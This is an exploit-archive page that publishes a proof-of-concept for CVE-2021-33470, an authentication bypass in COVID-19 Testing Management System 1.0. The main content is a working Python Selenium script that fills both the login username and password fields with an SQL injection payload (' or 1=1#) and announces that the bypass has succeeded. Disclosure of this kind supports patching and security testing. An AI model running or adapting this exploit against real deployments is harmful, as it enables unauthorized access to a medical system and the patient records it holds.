COVID-19 Testing Management System 1.0 SQL Injection

COVID-19 Testing Management System 1.0 SQL Injection: Posted Jun 8, 2021; Authored by nu11secur1ty; COVID-19 Testing Management System version 1.0 remote SQL injection exploit based upon the original discovery by Rohit Burke in May of 2021.; tags | exploit, remote, sql injection; advisories | CVE-2021-33470; SHA-256 | 0a0103bf0a7eac9dcea23976913fe85ee3e02bab59a17d48ed4103f626bfc8c4; Download | Favorite | View

COVID-19 Testing Management System 1.0 SQL Injection

# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection
(Authentication Bypass)
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 06.08.2021
# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# CVE: CVE-2021-33470
# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE: CVE-2021-33470

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="
http://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php
"

#enter your login username SQL bling injection
username="nu11secur1ty' or 1=1#"
#enter your login password SQL bling injection
password="nu11secur1ty' or 1=1#"

# test and proof the SQL injection
# user: admin
# password: password

#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="inputpwd"

#enter the element for submit button by class
element_for_submit="btn.btn-primary.btn-user.btn-block"

#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
time.sleep(3)
signInButton = browser.find_element_by_class_name(element_for_submit)
signInButton.click()

print("payload is deployed NOW, you have SQL Authentication Bypass =)...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 99 files
Gentoo 29 files
indoushka 26 files
Debian 16 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
jheysel-r7 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

COVID-19 Testing Management System 1.0 SQL Injection

COVID-19 Testing Management System 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

COVID-19 Testing Management System 1.0 SQL Injection

Share This

COVID-19 Testing Management System 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems